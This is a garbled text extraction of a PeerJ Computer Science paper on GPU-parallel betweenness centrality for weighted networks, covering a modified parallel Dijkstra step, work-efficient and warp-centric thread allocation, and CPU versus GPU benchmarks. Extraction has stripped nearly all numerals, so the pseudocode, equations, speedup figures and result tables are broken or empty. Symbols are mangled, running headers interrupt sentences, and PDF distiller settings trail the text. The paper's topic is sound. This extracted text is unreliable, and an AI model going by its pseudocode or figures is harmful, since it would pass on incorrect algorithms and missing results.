u[s] ) : f[s] ) : s[ ] ) s; slen ) : ends[ ] ) ; ends[ ] ) ; endslen ) : � fan et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the level of node i in the multi-level structure and pi represents the set of predecessors of vertex i. previous high-performance parallel sssp algorithms have calculated only the shortest-path values, neglecting the number of shortest paths and the level relationships. in this paper, we propose a variant of the parallel dijkstra algorithm that produces both the number of shortest paths and the multi-level structure needed in our betweenness algorithm. in the sequential dijkstra algorithm, the fact that one frontier node is selected in each iteration makes parallelization a difficult task. however, this restriction can be relaxed, which means that several nodes can be settled at once to form the frontier set, allowing them to be inspected simultaneously in the next step. moreover, these settled nodes satisfy the level condition, and because of this, they form a new level to be inspected simultaneously in the dependency accumulation step. in this paper, we apply the method described in ortega-arranz et al. ( ). in this method, �node v = min(w(v, u): (v, u) ∈ e) is precomputed. then, we define �i as �i ¼ min ðdðuÞþ�node uÞ : u uif g; ( ) where d(u) is the tentative distance of node u and ui is the set of unsettled nodes in iteration i. all nodes that satisfy the condition dðvÞ� �i ( ) are settled and become frontier nodes. when the dijkstra algorithm is applied in the bc calculation, the number of shortest paths should be counted, and predecessor relationships between vertices at the same level are not permitted; otherwise, the parallel algorithm bc: dependency accumulation. : depth ) endslen - : while depth > do : start ) ends[depth - ] : end ) ends[depth] - : for � i � end - start do in parallel : w ) s[start + i] : dsw ) : for v ∈ neighbors(w) do : if d[v] = d[w] + weightwv then : c ) s [w]/s[v] ∗ ( + d[v]) : dsw ) dsw + c : atomicadd(edgebc[w], c) : d[w] ) dsw : if w s s then : atomicadd(bc[w], d[w]) : depth ) depth - fan et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ algorithm would result in incorrect dependencies. to this end, the above condition should be modified to dðvÞ < �i: ( ) figure b illustrates an example, in which the vertex v is the source node. if eq. ( ) were to be applied, v and v would become the frontier nodes after the inspection of v in the first iteration, and the number of shortest paths would be for both v and v . then, v and v would be inspected simultaneously in the next step. if v were to be processed first, the number of shortest paths for v would be set to ; however, the correct number of shortest paths for v is . this mistake arises from the overambitious condition defined in eq. ( ); v should not be settled after the first iteration. although the distances for all nodes would be correct with eq. ( ), the numbers of shortest paths would be wrong. by contrast, eq. ( ) will lead to the correct number of shortest paths for v because only v will be settled after the first iteration. this condition appears on line in algorithm . by applying eq. ( ) in the sssp step, we achieve the correct numbers of shortest paths and construct a multi-level structure by setting each set of frontier nodes as a new level. algorithm presents our parallel dijkstra algorithm in detail. the tentative distance and number of shortest paths are calculated as shown in lines – . for a frontier vertex v, the thread inspects all edges connected to v. for an edge (v, w), if it finds a shorter path from v, i.e., d[v] + weightvw < d[w], d[w] will be updated, and s[w] will be set to zero since the previous number of shortest paths is invalid. then, if d[w] = d[v] + weightwv, the number of shortest paths for vertex w will be updated to s[w] + s[v] in accordance with the brandes algorithm. in this way, both the value and number of shortest paths are calculated and stored. in this part of the calculation, a race condition problem may arise because multiple nodes in the frontier set may connect to the same node, as seen in figure (a) an example of a multi-level structure. it is built in the sssp step and will later be used in the dependency accumulation step. nodes at the same level are inspected simultaneously in both steps. (b) an example of the selection of a set of frontier nodes in which using eq. ( ) will cause the number of shortest paths calculated for v to be incorrect. (c) an example of a race condition. v and v are both frontier nodes in the same iteration, and both are connected to w. full-size doi: . /peerj-cs. /fig- fan et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ fig. c. in this example, both v and v are in the frontier set and are connected to w, which results in the classical race condition problem. the reason this is a problem is that two or more threads may attempt to modify d[w] or s[w] simultaneously. to avoid this, we define a lock for each node. the first thread to focus on w will be granted the lock, and other threads will not be permitted to change d[w] and �[w]. we also adopt an atomic operation atomiccas and a variable needlock. for all threads, needlock is initially true (line ), and the threads will enter the following iteration. if a thread is granted the lock for w, it will run the shortest-path procedure and then release the lock (line ), and needlock = false will be assigned (line ) to exit the loop. if another thread owns algorithm bc: shortest-path calculation using the dijkstra algorithm. : while � < ∞ do : for v ∈ v and f[v] = do in parallel : for w ∈ neighbors(v) do : needlock ) true : while needlock do : if = atomiccas(lock[w], , ) then : if u[w] = and d[v] + weightvw < d[w] then : d[w] ) d[v] + weightvw : s [w] ) : if d[w] = d[v] + weightvw then : s[w] ) s[w] + s[v] : atomicexch(lock + w, ) : needlock ) false : � ) ∞ : for v ∈ v do in parallel : if u[v] = and d[v] < ∞ then : atomicmin(�,d[v] + �node v) : cnt ) : for v ∈ v do in parallel : f[v] ) : if u[v] = and d[v] < � then : u[v] ) : f[v] ) : t ) atomicadd(slen, ) : s[t] ) v : atomicadd(cnt, ) : if cnt > then : ends[endslen] ) ends[endslen - ] + cnt : endslen ) endslen + fan et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the lock, the thread will run the circulation but do nothing until the other thread releases the lock. in this way, all threads that need to inspect vertex w can perform the shortest- path task while avoiding race conditions. the lock cannot be replaced with an atomic operation because in the shortest-path procedure, multiple instructions related to w (from lines to ) are executed, rather than only one, and they cannot be interrupted by other threads that may modify d[w] and s[w]. after d and s have been computed for all nodes, we can obtain di based on the computed results, as seen on lines – . finally, u, f, s and ends are updated for the next iteration. work-efficient method as seen on line in algorithm , threads will be assigned to all nodes, but calculations will be performed only for nodes in the frontier set, which may be inefficient. mclaughlin & bader ( , ) developed an excellent work-efficient technique for solving this problem. in this paper, we develop a work-efficient version of our algorithm by adopting algorithm work-efficient bc: variable initialization. : for v ∈ v do in parallel : // initialize all variables except f : f[ ] ) s : flen = : // initialize other variables algorithm work-efficient bc: shortest-path calculation using the dijkstra algorithm. : while � < ∞ do : for � i < flen do in parallel : v ) f[i] : // inspect v : // calculate � : flen ) : for v ∈ v do in parallel : if u[v] = and d[v] < � then : u[v] ) : t ) atomicadd(flen, ) : f[t] ) v : if flen > then : ends[end slen] ) end s[end slen - ] + flen : end slen ) end slen + : for � i < flen do in parallel : s[slen + i] ) f[i] : slen ) slen + flen fan et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ this idea. f is replaced with a queue that stores all frontier nodes, and a variable flen is defined to recode the length of f, as seen in algorithm . then, at line in algorithm , threads can be assigned to f[ ] ∼ f[flen - ], which may be much smaller than the total number of nodes. at the same time, the method used to update f should also be modified as shown in algorithm . warp-centric method many real-world networks are scale-free in nature, which means that their degree distributions follow a power law. when parallel graph algorithms are implemented using the node-parallel strategy, this feature gives rise to a severe load-imbalance problem. most nodes have low degrees, while some nodes have extremely high degrees. threads that are assigned to high-degree nodes will run slowly, and other threads will have to wait. the edge-parallel strategy can be used to solve this problem (jia et al., ), but it simultaneously introduces other problems of underutilization. in this paper, we apply the novel warp-centric method (hong et al., ), in which a warp rather than a thread is allocated to a single node. then, each thread within a warp focuses on a subset of the edges connected to the corresponding node. as a result, each thread does less work for nodes with high degrees, and the wait time will be greatly decreased. moreover, memory access patterns can be more tightly grouped compared with conventional thread-level task allocation, and consequently, the efficiency of memory access can also be fundamentally improved. nevertheless, the warp-centric method also has some disadvantages. first, the degree of a node may be smaller than the warp size, which is always in modern gpus. to solve this problem, hong et al. ( ) proposed virtual warps. second, the number of required threads will be increased overall because each node needs warp_size threads figure examples of thread allocation using (a) the node-parallel method and (b) the work- efficient method. red nodes and white nodes are frontier and non-frontier nodes, respectively, and each arrow represents a warp, which contains multiple threads that are all assigned to the same node. in the warp-centric method, more threads will be wasted on non-frontier nodes that do not need to be inspected. however, this problem can be solved by combining the warp-centric and work-efficient methods, as shown in (b). full-size doi: . /peerj-cs. /fig- fan et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ rather than one thread in this approach (here, warp_size denotes the number of threads in each warp). however, the number of threads per block is fixed; hence, each thread will be iteratively assigned to additional nodes, which may result in low performance. we find that the work-efficient technique can effectively relieve this problem because it requires fewer threads compared with the conventional node-parallel method, as seen in fig. . in this paper, we apply the warp-centric method in combination with both the node-parallel and work-efficient methods, resulting in four algorithms with different thread allocation strategies, and we compare these algorithms on both real-world and synthetic networks. experiments networks and settings we collected ten weighted real-world networks from the internet. these networks are of a broad variety of types, including collaboration networks, biological networks and social networks. we also downloaded a large synthetic network with vertices and more than million edges. these networks are publicly available on the internet and have been analyzed extensively in previous studies (rossi & ahmed, ; bansal et al., ; palla et al., ; barabási & albert, ; leskovec & krevl, ; de domenico et al., ; leskovec, adamic & huberman, ; bader et al., , ). the details of these networks are listed in table . we developed a parallel cpu algorithm based on graph-tool (https://graph-tool.skewed.de), which is an efficient network analysis tool whose core data and algorithms are implemented in c++, making it efficient for various graph-related algorithms, including betweenness calculations (https://graph-tool.skewed.de/performance). the bc calculation performed by this tool relies on the boost graph library (siek, lee & lumsdaine, ), and it supports the execution of parallel betweenness algorithms on weighted networks (gregor & lumsdaine, ) (http://www.boost.org/doc/libs/ _ _ /libs/ graph_parallel/doc/html/index.html). we ran our four gpu implementations on a geforce gtx using the cuda . toolkit. the geforce gtx is a compute-capable . gpu designed using the pascal architecture that has multiprocessors, gb of device memory, and a clock frequency of , mhz. the cpu we used is an intel core i - k processor. the core i - k has a frequency of . ghz, an mb cache and eight physical processor cores. we used four threads since hyperthreading does not improve performance, and we also ran a sequential version because such implementations are still widely applied by network researchers. to further investigate the effects of network structures on the algorithms’ performance, we generated two types of networks: erdös–rényi (er) random graphs (erdös & rényi, ) and kronecker graphs (leskovec et al., ). the degree distribution of an er random graph is a poisson distribution, meaning that its node degrees are relatively balanced. meanwhile, a kronecker graph possesses scale-free and small-world characteristics, making it appropriate for studying the load-imbalance problem. we uniformly assigned random edge weights ranging from to , as done in previous studies (martin, torres & gavilanes, ; ortega-arranz et al., ). we used these synthetic networks to study the relationship between the graph structure and the traversal strategy. fan et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://graph-tool.skewed.de https://graph-tool.skewed.de/performance http://www.boost.org/doc/libs/ _ _ /libs/graph_parallel/doc/html/index.html http://www.boost.org/doc/libs/ _ _ /libs/graph_parallel/doc/html/index.html http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ results overall performance from table , we can see that all of the gpu programs achieve better performance than both the sequential and parallel cpu versions on the real-world networks. the best gpu algorithm for each network achieves speedups of . � to . � compared with the parallel cpu method and of � to � compared with the sequential cpu algorithm, and the performance can be markedly improved by assigning an appropriate warp_size. even on the two large networks with more than one million vertices, our algorithm can produce results within or days. note that the performance of previous gpu-based bc algorithms for unweighted networks might be superior to ours on networks of similar sizes because the complexity of the weighted bc algorithm is higher than that of its unweighted counterparts. as seen from table , the work-efficient method is more efficient than the node-parallel method on all networks, whereas the warp-centric method performs better on high-degree networks, such as the three biological networks. however, combining the warp-centric method and the work-efficient method always results in superior or approximately equal performance compared with the work-efficient method alone because it causes fewer threads to be required in each step, which, in turn, alleviates the second disadvantage of the warp-centric method. for networks with low average degrees, such as ca-mathscinet-dir, rt-higgs and mt-higgs, applying the warp-centric method with the real warp_size ( ) is always inefficient because the nodes’ degrees are always smaller than warp_size. using a smaller virtual warp_size enables better performance on table details of networks from public datasets. network vertices edges max degree average degree description bio-human-gene (rossi & ahmed, ; bansal et al., ) , , , , , . human gene regulatory network bio-human-gene (rossi & ahmed, ; bansal et al., ) , , , , , . human gene regulatory network bio-mouse-gene (rossi & ahmed, ; bansal et al., ) , , , , . mouse gene regulatory network ca-mathscinet-dir (rossi & ahmed, ; palla et al., ) , , . co-authorship network actors (barabási & albert, ) , , , , . actor collaboration network rt-higgs (leskovec & krevl, ; de domenico et al., ) , , , . twitter retweeting network mt-higgs (leskovec & krevl, ; de domenico et al., ) , , , . twitter mention network rec-amazon (rossi & ahmed, ; leskovec, adamic & huberman, ) , , . product copurchase network sc-shipsec (rossi & ahmed, ; bader et al., ) , , , . scientific computing network soc-pokec (leskovec & krevl, ) , , , , , . pokec social network kron_g (bader et al., ) , , , , , . large kronecker network fan et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ these networks, as shown in table , and we will also further demonstrate this later. with an appropriate adjustment of warp_size for low-degree networks, the best- performing program achieves average speedups of . � compared with the parallel cpu implementation and . � compared with the baseline node-parallel strategy. for the rec-amazon graph, which has the lowest maximum degree, the load-imbalance problem does not exist, and for this reason, the warp-centric method cannot improve the performance; instead, the algorithm in which the work-efficient strategy alone is applied performs the best. influence of network structure to deeply investigate the relationship between network structure and performance for the four gpu implementations, we further ran these algorithms on two types of synthetic graphs, with the results shown in fig. . from figs. a to d, we find that the work-efficient algorithm performs better than the node-parallel algorithm on all networks since it always reduces the required number of threads. as seen in figs. a and b, table benchmark results of various bc algorithms on weighted graphs, including a sequential cpu algorithm, a four-thread cpu algorithm, and node-parallel (np), work-efficient (we) and warp-centric (warpx denotes that the warp_size is x) algorithms. algorithm bio-human-gene bio-human-gene bio-mouse-gene ca-mathscinet-dir actors cpu (sequential) , . , . , . , . – cpu ( threads) , . , . , . , . , . np , . . , . , . , . we , . . , . , . , . np+warp . . , . , . , . we+warp . . , . , . , . we+warp . . , . , . , . we+warp . . , . , . , . we+warp . . , . , . , . best speedup (over sequential cpu) . � . � . � . � – best speedup (over parallel cpu) . � . � . � . � . � algorithm rt-higgs mt-higgs rec-amazon sc-shipsec soc-pokec kron_g cpu (sequential) , . , . , . , . – – cpu ( threads) , . . . , . – – np , . . . . – – we , . . . . – , . ( . h) np+warp , . . , . , . – , . ( . h) we+warp , . . . . , . ( h) – we+warp , . . . . – – we+warp , . . . . – – we+warp , . . . . – – best speedup (over sequential cpu) . � . � . � . � – – best speedup (over parallel cpu) . � . � . � . � – – notes: the times are expressed in seconds. the last two rows report speedups. the result of the cpu sequential algorithm on the actors network cannot be provided because this program consumed too much time on this network. for the same reason, we also ran only selected gpu algorithms on the two very large networks. bold entries display running times of the fastest algorithms for specific networks. fan et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the warp-centric method works well on networks of high degrees, which is consistent with the findings for the real-world networks. note that for kronecker graphs, the warp-centric method works better than it does for random graphs since kronecker graphs have a severe load-imbalance problem, which the warp-centric technique can appropriately address. by contrast, for er random graphs, as shown in fig. a, the only advantage of the warp-centric method is its efficient memory access. for low-degree graphs, the warp-centric method results in even worse performance than the node-parallel strategy, as can be seen in figs. c and d, because the degrees are always smaller than warp_size. for random graphs, the performance of the warp-centric method is scale : log (number of nodes) tim e (s ) a scale : log (number of nodes) tim e (s ) b average degree tim e (s ) c average degree tim e (s ) d node−parallel work−efficient warp−centric work−efficient+warp−centric average degree a ve ra g e d e p th kronecker random e figure performance of the four implementations on er random and kronecker graphs. here, warp_size is fixed to in the two warp-centric methods. (a) and (b) show the results of varying the number of nodes from to for er random and kronecker graphs, respectively, with a fixed average degree of for both types of networks. (c) and (d) show the results of varying the average degree for random and kronecker networks, respectively, where the random networks contain , vertices and the kronecker networks contain nodes. (e) illustrates the average depths of the search trees used for the random graphs in (c) and the kronecker graphs in (d). networks with greater depths have smaller average frontier sets, resulting in poor parallel performance. full-size doi: . /peerj-cs. /fig- fan et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ extremely poor when the average degree is smaller than , and fig. e illustrates the reason. the low average degree results in a large average depth, which means that the average size of the frontier sets is small. in this case, the warp-centric method assigns more useless threads to nodes that do not need inspection. however, as the degree grows and approaches warp_size, the depth simultaneously drops sharply, which makes the warp-centric method perform much better. meanwhile, low-degree kronecker graphs have power-law degree distributions and small average depths; consequently, the warp-centric method does not perform as poorly as on random graphs. however, the combination of these two methods always results in faster performance than the work- efficient method alone because it avoids the second disadvantage of the warp-centric method, as discussed in the previous section. in conclusion, the work-efficient method always achieves better performance, whereas the performance of the warp-centric method depends on the network structure; however, an algorithm that combines the two always achieves the best performance. analysis of warp size as seen from the above analysis, using a smaller warp_size may accelerate both the node-parallel and work-efficient implementations combined with the warp-centric method when the average degree of the network is small. this hypothesis is verified in table . we applied smaller warp_size values on the rt-higgs network, the mt-higgs network and two synthetic graphs with an average degree of four. we find that implementations with smaller warp_size values perform better than either the baseline node-parallel algorithm or the algorithm with the largest warp_size on both of the low-degree real-world networks, rt-higgs and mt-higgs. moreover, when coupled with the work-efficient method, algorithms with smaller warp_size values also perform better than either the work-efficient strategy alone or the combination of the work-efficient strategy and the largest warp_size. the reason is that a small warp_size reduces the required number of threads, thereby eliminating the waste incurred when the number table the results of using different values of warp_size on several low-degree networks. network rt-higgs mt-higgs er kronecker node-parallel . . . . warp . . . . warp . . . . warp . . . . warp . . . . we . . . . we+warp . . . . we+warp . . . . we+warp . . . . we+warp . . . . notes: we is short for work-efficient algorithm. both the er network and the kronecker network have nodes, and the average node degree of each is four. the times are expressed in seconds. for these low-degree networks, implementations with smaller warp_size values achieve better performance. fan et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ of threads assigned to a node is greater than its degree. the implementations with small warp_size values coupled with the work-efficient method achieve the best performance because they avoid both disadvantages of the warp-centric method while utilizing its advantages. the results obtained on the low-degree kronecker graph are similar to those obtained on realistic networks for the same reason. for er random graphs, algorithms with smaller warp_size values do not achieve better performance compared with the node-parallel version because of the large average tree depth, as discussed in the previous section. however, when the work-efficient method is applied, implementations with smaller warp_size values perform slightly better than the work-efficient algorithm alone, thereby further demonstrating the excellent performance and stability of the joint algorithm. in summary, the joint algorithm is the most efficient and the most insensitive to the network structure. moreover, if we choose an appropriate warp_size for the graph of interest, the performance of the joint algorithm can be even further improved (see tables and ). conclusion existing gpu versions of bc algorithms have concentrated only on unweighted networks for simplicity. our work offers an algorithm for computing bc in large weighted networks, bridging this gap and enabling a marked efficiency enhancement compared with cpu implementations. moreover, we incorporate two excellent techniques into our algorithm: the work-efficient and warp-centric methods. the work-efficient method allocates threads more efficiently, and the warp-centric method solves the load-imbalance problem while simultaneously optimizing memory access. we have compared these implementations with sequential and parallel cpu algorithms on realistic networks. the results show that the gpu parallel algorithms perform much better than the cpu algorithms and that the algorithm that combines both the work-efficient and warp-centric techniques is the best, achieving . � to . � speedups over the parallel cpu version and � to � speedups over the sequential cpu version. results obtained on synthetic random graphs and kronecker graphs further demonstrate the superior performance of our solution. in our future work, we will consider other techniques for addressing the load- imbalance problem to further improve the performance of our algorithm (davidson et al., ; wang et al., ). in addition, solomonik et al. ( ) have proposed a parallel bc algorithm for weighted graphs based on novel sparse matrix multiplication routines that has achieved impressive performance, which may provide further inspiration for accelerating our algorithm. we may also consider implementing a gpu algorithm for processing dynamic networks. when networks change only slightly (e.g., a few new nodes are added or a few links vanish), recalculating the bc for all nodes is unnecessary because the bc of most nodes and edges will not change. several previous works have explored sequential algorithms for addressing this issue (lee, choi & chung, ; singh et al., ; nasre, pontecorvi & ramachandran, ). we plan to develop a gpu version of these algorithms to achieve better performance. fan et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ additional information and declarations funding this work was supported by nsfc (grant no. ) and the fund of the state key laboratory of software development environment (grant nos. sklsde- zx- and sklsde- zx- ). rui fan is supported by the innovation foundation of buaa for phd graduates. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: nsfc: . state key laboratory of software development environment: sklsde- zx- and sklsde- zx- . innovation foundation of buaa for phd graduates. competing interests the authors declare that they have no competing interests. author contributions � rui fan conceived and designed the experiments, performed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables, performed the computation work. � ke xu conceived and designed the experiments, wrote the paper, reviewed drafts of the paper. � jichang zhao conceived and designed the experiments, wrote the paper, reviewed drafts of the paper. data availability the following information was supplied regarding data availability: zhao, jichang ( ): a gpu-based solution to fast calculation of betweenness centrality on large weighted networks. figshare. https://doi.org/ . /m .figshare. .v references abedi m, gheisari y. . nodes with high centrality in protein interaction networks are responsible for driving signaling pathways in diabetic nephropathy. peerj :e doi . /peerj. . bader da, meyerhenke h, sanders p, schulz c, kappes a, wagner d. . benchmarking for graph clustering and partitioning. new york: springer, – . bader da, meyerhenke h, sanders p, wagner d, eds. . graph partitioning and graph clustering. in: th dimacs implementation challenge workshop, atlanta, ga, georgia. bansal m, belcastro v, ambesi-impiombato a, di bernardo d. . how to infer gene networks from expression profiles. molecular systems biology : doi . /msb . fan et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://doi.org/ . /m .figshare. .v http://dx.doi.org/ . /peerj. http://dx.doi.org/ . /msb http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ barabási a-l, albert r. . emergence of scaling in random networks. science ( ): – doi . /science. . . . barthélemy m. . betweenness centrality in large complex networks. european physical journal b ( ): – doi . /epjb/e - - . bell n, garland m. . implementing sparse matrix–vector multiplication on throughput- oriented processors. in: proceedings of the conference on high performance computing networking, storage and analysis (sc’ ). new york: acm, : – : . brandes u. . a faster algorithm for betweenness centrality. journal of mathematical sociology ( ): – . cong g, bader da. . an experimental study of parallel biconnected components algorithms on symmetric multiprocessors (smps). in: th ieee international parallel and distributed processing symposium, denver, co, usa. washington, d.c.: ieee, b. davidson a, baxter s, garland m, owens jd. . work-efficient parallel gpu methods for single-source shortest paths. in: ieee th international parallel and distributed processing symposium, phoenix, az, usa. washington, d.c.: ieee, – . de domenico m, lima a, mougel p, musolesi m. . the anatomy of a scientific rumor. scientific reports ( ): doi . /srep . delling d, goldberg av, nowatzyk a, werneck rf. . phast: hardware-accelerated shortest path trees. in: proceedings of the ieee international parallel and distributed processing symposium (ipdps’ ). washington, dc: ieee computer society, – . dijkstra ew. . a note on two problems in connexion with graphs. numerische mathematik ( ): – doi . /bf . erdös p, rényi a. . on random graphs i. publicationes mathematicae (debrecen) : – . floyd rw. . algorithm : shortest path. communications of acm ( ): doi . / . . freeman lc. . a set of measures of centrality based on betweenness. sociometry ( ): – doi . / . girvan m, newman mej. . community structure in social and biological networks. proceedings of the national academy of sciences of the united states of america ( ): – . goh k-i, oh e, kahng b, kim d. . betweenness centrality correlation in social networks. physical review e ( ): doi . /physreve. . . gregor d, lumsdaine a. . the parallel bgl: a generic library for distributed graph computations. in: parallel object-oriented scientific computing (poosc), bloomington, in, usa. harish p, narayanan pj. . accelerating large graph algorithms on the gpu using cuda. berlin: springer, – . hong s, kim sk, oguntebi t, olukotun k. . accelerating cuda graph algorithms at maximum warp. in: proceedings of the th acm symposium on principles and practice of parallel programming (ppopp’ ). new york: acm, – . jia y, lu v, hoberock j, garland m, hart jc. . edge v. node parallelism for graph centrality metrics. gpu computing gems : – doi . /b - - - - . - . lee m-j, choi s, chung c-w. . efficient algorithms for updating betweenness centrality in fully dynamic graphs. information sciences (supplement c): – doi . /j.ins. . . . leskovec j, adamic la, huberman ba. . the dynamics of viral marketing. acm transactions on the web (tweb) ( ): doi . / . . fan et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /science. . . http://dx.doi.org/ . /epjb/e - - http://dx.doi.org/ . /srep http://dx.doi.org/ . /bf http://dx.doi.org/ . / . http://dx.doi.org/ . / http://dx.doi.org/ . /physreve. . http://dx.doi.org/ . /b - - - - . - http://dx.doi.org/ . /j.ins. . . http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ leskovec j, chakrabarti d, kleinberg j, faloutsos c, ghahramani z. . kronecker graphs: an approach to modeling networks. journal of machine learning research : – . leskovec j, krevl a. . snap datasets: stanford large network dataset collection. available at http://snap.stanford.edu/data. leydesdorff l. . betweenness centrality as an indicator of the interdisciplinarity of scientific journals. journal of the american society for information science and technology ( ): – doi . /asi. . ma x, sayama h. . mental disorder recovery correlated with centralities and interactions on an online social network. peerj :e doi . /peerj. . martin pj, torres r, gavilanes a. . cuda solutions for the sssp problem. in: proceedings of the th international conference on computational science: part i (iccs’ ). berlin: springer-verlag, – . mclaughlin a, bader da. . scalable and high performance betweenness centrality on the gpu. in: proceedings of the international conference for high performance computing, networking, storage and analysis (sc’ ). piscataway: ieee press, – . mclaughlin a, bader da. . fast execution of simultaneous breadth-first searches on sparse graphs. in: ieee st international conference on parallel and distributed systems (icpads), melbourne, vic, australia. washington, d.c.: ieee computer society, – . merrill d, garland m, grimshaw a. . high-performance and scalable gpu graph traversal. acm transactions on parallel computing ( ): – doi . / . mitchell r, frank e. . accelerating the xgboost algorithm using gpu computing. peerj computer science :e doi . /peerj-cs. . motter ae, lai y-c. . cascade-based attacks on complex networks. physical review e ( ): doi . /physreve. . . nasre m, pontecorvi m, ramachandran v. . betweenness centrality—incremental and faster. berlin: springer, – . ortega-arranz h, torres y, llanos dr, gonzalez-escribano a. . a new gpu-based approach to the shortest path problem. in: international conference on high performance computing simulation (hpcs), helsinki, finland. washington, d.c.: ieee, – . palla g, farkas ij, pollner p, derényi i, vicsek t. . fundamental statistical features and self-similar properties of tagged networks. new journal of physics ( ): doi . / - / / / . rossi ra, ahmed nk. . the network data repository with interactive graph analytics and visualization. in: proceedings of the twenty-ninth aaai conference on artificial intelligence, austin, texas. palo alto: association for the advancement of artificial intelligence. sariyüce ae, kaya k, saule e, çatalyürek uv. . betweenness centrality on gpus and heterogeneous architectures. in: proceedings of the sixth workshop on general purpose processor using graphics processing units (gpgpu- ). new york: acm, – . shi z, zhang b. . fast network centrality analysis using gpus. bmc bioinformatics ( ): doi . / - - - . siek jg, lee l-q, lumsdaine a. . the boost graph library: user guide and reference manual, portable documents. upper saddle river, new jersey: pearson education. singh rr, goel k, iyengar srs, gupta s. . a faster algorithm to update betweenness centrality after node alteration. internet mathematics ( – ): – doi . / . . . fan et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://snap.stanford.edu/data http://dx.doi.org/ . /asi. http://dx.doi.org/ . /peerj. http://dx.doi.org/ . / http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . /physreve. . http://dx.doi.org/ . / - / / / http://dx.doi.org/ . / - - - http://dx.doi.org/ . / . . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ solomonik e, besta m, vella f, hoefler t. . scaling betweenness centrality using communication-efficient sparse matrix multiplication. in: jackie k, ed. the international conference for high performance computing, networking, storage and analysis (s), denver, co, usa. new york: acm. wang y, davidson a, pan y, wu y, riffel a, owens jd. . gunrock: a high-performance graph processing library on the gpu. in: proceedings of the th acm sigplan symposium on principles and practice of parallel programming (ppopp ). new york: acm, – . wang y, davidson a, pan y, wu y, riffel a, owens jd. . gunrock: a high-performance graph processing library on the gpu. in: proceedings of the st acm sigplan symposium on principles and practice of parallel programming (ppopp’ ). new york: acm, : , : . fan et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. a gpu-based solution for fast calculation of the betweenness centrality in large weighted networks introduction background related work gpu-based algorithm experiments conclusion references << /ascii encodepages false /allowtransparency false /autopositionepsfiles true /autorotatepages /none /binding /left /calgrayprofile (dot gain %) /calrgbprofile (srgb iec - . ) /calcmykprofile (u.s. web coated \ swop\ v ) /srgbprofile (srgb iec - . ) /cannotembedfontpolicy /warning /compatibilitylevel . /compressobjects /off /compresspages true /convertimagestoindexed true /passthroughjpegimages true /createjobticket false /defaultrenderingintent /default /detectblends true /detectcurves . /colorconversionstrategy /leavecolorunchanged /dothumbnails false /embedallfonts true /embedopentype false /parseiccprofilesincomments true /embedjoboptions true /dscreportinglevel /emitdscwarnings false /endpage - /imagememory /lockdistillerparams false /maxsubsetpct /optimize true /opm /parsedsccomments true /parsedsccommentsfordocinfo true /preservecopypage true /preservedicmykvalues true /preserveepsinfo true /preserveflatness true /preservehalftoneinfo false /preserveopicomments false /preserveoverprintsettings true /startpage /subsetfonts true /transferfunctioninfo /apply /ucrandbginfo /preserve /useprologue false /colorsettingsfile (none) /alwaysembed [ true ] /neverembed [ true ] /antialiascolorimages false /cropcolorimages true /colorimageminresolution /colorimageminresolutionpolicy /ok /downsamplecolorimages false /colorimagedownsampletype /average /colorimageresolution /colorimagedepth /colorimagemindownsampledepth /colorimagedownsamplethreshold . /encodecolorimages true /colorimagefilter /flateencode /autofiltercolorimages false /colorimageautofilterstrategy /jpeg /coloracsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /colorimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg coloracsimagedict << /tilewidth /tileheight /quality >> /jpeg colorimagedict << /tilewidth /tileheight /quality >> /antialiasgrayimages false /cropgrayimages true /grayimageminresolution /grayimageminresolutionpolicy /ok /downsamplegrayimages false /grayimagedownsampletype /average /grayimageresolution /grayimagedepth /grayimagemindownsampledepth /grayimagedownsamplethreshold . /encodegrayimages true /grayimagefilter /flateencode /autofiltergrayimages false /grayimageautofilterstrategy /jpeg /grayacsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /grayimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg grayacsimagedict << /tilewidth /tileheight /quality >> /jpeg grayimagedict << /tilewidth /tileheight /quality >> /antialiasmonoimages false /cropmonoimages true /monoimageminresolution /monoimageminresolutionpolicy /ok /downsamplemonoimages false /monoimagedownsampletype /average /monoimageresolution /monoimagedepth - /monoimagedownsamplethreshold . /encodemonoimages true /monoimagefilter /ccittfaxencode /monoimagedict << /k - >> /allowpsxobjects false /checkcompliance [ /none ] /pdfx acheck false /pdfx check false /pdfxcompliantpdfonly false 